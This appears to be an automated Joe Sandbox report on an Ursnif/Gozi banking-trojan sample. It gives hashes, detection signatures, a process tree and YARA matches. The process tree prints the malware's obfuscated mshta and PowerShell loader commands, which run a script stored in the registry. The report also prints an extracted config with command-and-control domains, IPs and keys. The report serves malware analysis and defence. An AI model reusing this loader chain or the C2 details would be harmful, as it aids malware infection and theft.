Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bf.exe

Overview

General Information

Sample Name:bf.exe
Analysis ID:722154
MD5:b7ce4f9f6ecd85bb5edbb6964226fdb6
SHA1:12b28a42e960dfc522348eba37b00ea74a0df527
SHA256:bf5845a6b0df356338cc4ae53dd2cdefcb114bd95f351e55fd430cee5408ffeb
Tags:exegozi
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Writes or reads registry keys via WMI
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Modifies the context of a thread in another process (thread injection)
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • bf.exe (PID: 1364 cmdline: C:\Users\user\Desktop\bf.exe MD5: B7CE4F9F6ECD85BB5EDBB6964226FDB6)
    • control.exe (PID: 4784 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 5064 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ffsw='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ffsw).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rxihymmmsf -value gp; new-alias -name qvfmhhdt -value iex; qvfmhhdt ([System.Text.Encoding]::ASCII.GetString((rxihymmmsf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6048 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4rgoqrxw.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 4720 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE2A5.tmp" "c:\Users\user\AppData\Local\Temp\CSCC346B8403E7B4A1592C575AE3967513E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3340 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\n2sgiaoa.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2888 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB8E.tmp" "c:\Users\user\AppData\Local\Temp\CSC1B282484FFBD4A98A4CBD8847ACCD8A8.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup
{"RSA Public Key": "GMoZf7gMROqzfy+P3mEeqSfHqIRAPg1d/uP2nOBLSR0sg89AdjGg/BLNdTPN8XbPrvLnZTlSAywg+YF//NxPkEZ+7hQVwoW+eGDjXjeTxnbr1pnuZAEZvZ5pJhvMSPakNawHi4xnL8zUKFcpnLcVW6aNM9fO9qEz02wFRvLZs5o11GrslLDYHDvQ0SD/opuDXOeSU7Ly+saXGzcMGJbb2gGYqQeP0wSX+OxMoI8G/dmzRLFFPaEi3LHTEkvTi4eHIKkf+2IdYYEmrS5ODeFooRl4Z5rjK+roU5Xa0a8yQ9B3bgnIiEzG4EM0+jPqnWnC8a0+x+5GseJTLbtpCdro7dXq/ZlwgpjCIEjV3+qceiU=", "c2_domain": ["trackingg-protectioon.cdn1.mozilla.net", "45.8.158.104", "trackingg-protectioon.cdn1.mozilla.net", "188.127.224.114", "weiqeqwns.com", "wdeiqeqwns.com", "weiqeqwens.com", "weiqewqwns.com", "iujdhsndjfks.com"], "botnet": "10103", "server": "50", "serpent_key": "AFRkxxddsKAnRl2J", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
SourceRuleDescriptionAuthorStrings
00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.567245222.00000000013A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\
    00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_fd494041unknownunknown
    • 0xff0:$a1: /C ping localhost -n %u && del "%s"
    • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
    • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
    • 0xca8:$a5: filename="%.4u.%lu"
    • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
    • 0xe72:$a9: &whoami=%s
    • 0xe5a:$a10: %u.%u_%u_%u_x%u
    • 0xc22:$a11: size=%u&hash=0x%08x
    • 0xc13:$a12: &uptime=%u
    • 0xda7:$a13: %systemroot%\system32\c_1252.nls
    • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
    00000000.00000003.615665561.00000000013A8000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Gozi_261f5ac5unknownunknown
    • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
    • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
    • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
    • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
    • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
    • 0x1868:$a9: Software\AppDataLow\Software\Microsoft\